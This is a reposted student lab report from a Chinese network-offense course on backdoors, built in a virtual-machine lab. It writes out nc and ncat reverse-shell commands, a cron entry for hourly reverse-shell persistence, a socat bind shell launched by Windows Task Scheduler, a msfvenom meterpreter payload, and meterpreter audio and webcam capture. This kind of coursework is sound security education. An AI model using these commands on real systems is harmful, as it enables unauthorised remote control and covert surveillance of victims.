20154324 刘康权 《网络对抗》Exp2 后门原理与实践

2023-10-15 11:50

本文主要是介绍20154324 刘康权 《网络对抗》Exp2 后门原理与实践,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、实践目标与内容

1.学习内容

  • 使用nc实现win,mac,Linux间的后门连接
  • meterpreter的应用
  • MSF POST 模块的应用

2.学习目标

  • 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的安全意识 。

3.概念

  • 后门就是不经过正常认证流程而访问系统的通道。
  • netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
  • socat是ncat的增强版,它使用的格式是socat [options]
  • 其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

二、实践步骤:常用的后门工具的应用

1.Windows获得Linux Shell

1.1查看win7和linux的ip地址

1344859-20180328172857013-1535439148.png
1344859-20180328172901683-632168490.png

1.2windows打开监听

ncat.exe -l -p 4324

1.3Linux反弹连接windows

nc 192.168.211.129 4324 -e /bin/sh

1.4windows下获得linux shell,运行指令

1344859-20180328174253868-339643878.png

2.Linux获得Windows Shell

2.1Linux打开监听

nc -l -p 4324

2.2Windows反弹连接Linux

ncat.exe -e cmd.exe 192.168.211.130 4324

2.3Linux下看到Windows的命令提示

1344859-20180328174522394-1826253073.png

3.使用nc传输数据

3.1Windows下监听4324端口

ncat.exe -l -p 4324

3.2Linux下连接到Windows的4324端口

nc 192.168.211.129 4324

3.3建立连接成功之后,进行字符串的传输

1344859-20180328175103399-518722171.png
1344859-20180328175111423-1015216105.png

4.使用netcat获取主机操作Shell,cron启动

4.1先在Windows系统下,监听4324端口

ncat.exe -l -p 4324

4.2在Linux环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。

1344859-20180328175739337-2120161976.png

4.3用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器
4.4在最后一行添加44 * * * * /bin/netcat 192.168.211.129 4312 -e /bin/sh,意思是在每个小时的第44分钟反向连接Windows主机的4324端口,因为当时的时间是17:53,所以设置成44,这样,过一分钟就能看到效果了

1344859-20180328202749072-749246493.png

4.5在17:54的时候,获得了Linux的shell

1344859-20180328202900261-398957951.png

5.使用socat获取主机操作Shell, 任务计划启动

5.1在Windows系统下,打开控制面板,搜索计划任务,进去后就可以开始创建任务,填写任务名称后,新建一个触发器。

1344859-20180328203430428-493010361.png

5.2在操作->程序或脚本中选择socat.exe文件的路径,并在添加参数一栏填写tcp-listen:4324 exec:cmd.exe,pty,stderr,这个命令是为了把cmd.exe绑定到端口4324,同时把cmd.exe的stderr重定向到stdout上

1344859-20180328203626403-1134498598.png

注意:参数之间用空格或者 :隔开!

5.3创建之后,右键任务直接运行
5.4 在Linux环境下输入指令,这里的第一个参数代表标准的输入输出,第二个流连接到Windows主机的4324端口,此时可以发现已经成功获得了一个cmd shell

socat - tcp:192.168.211.129:4324
1344859-20180328204041884-960196404.png

6.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

6.1在Linux环境下生成后门程序20154324_backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.130 LPORT=4324 -f exe > 20154324_backdoor.exe
1344859-20180328204313065-92622414.png

6.2通过nc指令将生成的后门程序传送到Windows主机上,Linux的nc指令在上图
  • nc 192.168.211.129 4324 < 20154324_backdoor.exe
  • ncat.exe -l 4324 > 20154324_backdoor.exe
    1344859-20180328204605541-456791993.png
6.3在Linux上使用msfconsole指令进入msf控制台,使用监听模块,并设置payload以及反弹回连的IP和端口:

1344859-20180328204717773-523520818.png
1344859-20180328204725761-313451169.png

6.4在设置完成后,在Linux环境执行监听

1344859-20180328204829334-918967867.png

6.5在Windows环境打开后门程序20154324_backdoor.exe,此时可以看到在Linux环境下已经获得了Windows主机的连接,并且得到了远程控制的shell

1344859-20180328205134707-2024677751.png

7.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

7.1在前一次实践中已经获取主机Shell的前提下,进行录音并保存

1344859-20180328205340477-1379671566.png

7.2获取摄像头权限进行照相并保存

1344859-20180328205436072-2047071933.png

三、问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 通过这次实践,我意识到有许多方式可以设置后门进入我的系统,我觉得最有可能存在后门的就是非官方下载的软件,这里面很有可能存在后门,使得其他人可以进入我的系统,还有就是可以在许多可执行文件中设置后门。

2.例举你知道的后门如何启动起来(win及linux)的方式?

  • 我认为当设置后门的可执行软件执行到启动后门的特定步骤时,后门就会启动。或者伪装成一种服务,当用户启用服务时,就会启动后门。在Linux下,通过cron设置定时任务,到了特定时间就会有获得一个shell。而在windows下,通过设置任务计划,设置相应条件,满足条件就会实现启动后门,

3.Meterpreter有哪些给你映像深刻的功能?

  • 它的msfvenom指令可以编写可执行的后门程序,甚至可以设置反弹回连的IP、回连的端口和文件的类型,在通过nc传输后可以实现后门的功能。还有就是它的help语句,可以查看各种命令以及相应的用途。最让我震惊的就是还能进行录音、摄像,以后我一定要把摄像头盖住了。

4.如何发现自己有系统有没有被安装后门?

  • 我想到的第一个办法就是用杀毒软件,哈哈,但通过这次实践,我认为我们还可以通过扫描端口,查看端口是否存在绑定后门程序等问题。

四、心得体会

在这次实践中,我们学习了后门的基本原理及它的运行过程,但最重要的还是实现了简单的后门连接,而在这次实践中,我们运用的应用程序中的后门,或者可以说伪装为特定应用的专用后门程序,我感觉我的电脑中很有可能就存在后门程序。同时我也见识到了后门的厉害,可以实现许多功能,甚至还能实现一些我自己都没用过的功能。一定要认真学习好网络对抗,至少要保护好自己的系统。

五、存在的问题

1.两个虚拟机无法实现连接

  • 解决方法:改变虚拟机的网络连接方式为NAT模式,并进行相应的设置。

2.无法实现虚拟机的摄像功能

  • 解决方法:在VMware中,点击虚拟机中的可移动设备进行连接,启动虚拟机的摄像功能。

转载于:https://www.cnblogs.com/liukangquan/p/8666581.html

这篇关于20154324 刘康权 《网络对抗》Exp2 后门原理与实践的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/217515

相关文章

java中Optional的核心用法和最佳实践

《java中Optional的核心用法和最佳实践》Java8中Optional用于处理可能为null的值,减少空指针异常,:本文主要介绍java中Optional核心用法和最佳实践的相关资料,文中... 目录前言1. 创建 Optional 对象1.1 常规创建方式2. 访问 Optional 中的值2.1

Mysql的主从同步/复制的原理分析

《Mysql的主从同步/复制的原理分析》:本文主要介绍Mysql的主从同步/复制的原理分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录为什么要主从同步?mysql主从同步架构有哪些?Mysql主从复制的原理/整体流程级联复制架构为什么好?Mysql主从复制注意

Nacos注册中心和配置中心的底层原理全面解读

《Nacos注册中心和配置中心的底层原理全面解读》:本文主要介绍Nacos注册中心和配置中心的底层原理的全面解读,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录临时实例和永久实例为什么 Nacos 要将服务实例分为临时实例和永久实例?1.x 版本和2.x版本的区别

Nginx Location映射规则总结归纳与最佳实践

《NginxLocation映射规则总结归纳与最佳实践》Nginx的location指令是配置请求路由的核心机制,其匹配规则直接影响请求的处理流程,下面给大家介绍NginxLocation映射规则... 目录一、Location匹配规则与优先级1. 匹配模式2. 优先级顺序3. 匹配示例二、Proxy_pa

MyBatis编写嵌套子查询的动态SQL实践详解

《MyBatis编写嵌套子查询的动态SQL实践详解》在Java生态中,MyBatis作为一款优秀的ORM框架,广泛应用于数据库操作,本文将深入探讨如何在MyBatis中编写嵌套子查询的动态SQL,并结... 目录一、Myhttp://www.chinasem.cnBATis动态SQL的核心优势1. 灵活性与可

pytest+allure环境搭建+自动化实践过程

《pytest+allure环境搭建+自动化实践过程》:本文主要介绍pytest+allure环境搭建+自动化实践过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐... 目录一、pytest下载安装1.1、安装pytest1.2、检测是否安装成功二、allure下载安装2.

使用vscode搭建pywebview集成vue项目实践

《使用vscode搭建pywebview集成vue项目实践》:本文主要介绍使用vscode搭建pywebview集成vue项目实践,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录环境准备项目源码下载项目说明调试与生成可执行文件核心代码说明总结本节我们使用pythonpywebv

Mybatis嵌套子查询动态SQL编写实践

《Mybatis嵌套子查询动态SQL编写实践》:本文主要介绍Mybatis嵌套子查询动态SQL编写方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录前言一、实体类1、主类2、子类二、Mapper三、XML四、详解总结前言MyBATis的xml文件编写动态SQL

apache的commons-pool2原理与使用实践记录

《apache的commons-pool2原理与使用实践记录》ApacheCommonsPool2是一个高效的对象池化框架,通过复用昂贵资源(如数据库连接、线程、网络连接)优化系统性能,这篇文章主... 目录一、核心原理与组件二、使用步骤详解(以数据库连接池为例)三、高级配置与优化四、典型应用场景五、注意事

python web 开发之Flask中间件与请求处理钩子的最佳实践

《pythonweb开发之Flask中间件与请求处理钩子的最佳实践》Flask作为轻量级Web框架,提供了灵活的请求处理机制,中间件和请求钩子允许开发者在请求处理的不同阶段插入自定义逻辑,实现诸如... 目录Flask中间件与请求处理钩子完全指南1. 引言2. 请求处理生命周期概述3. 请求钩子详解3.1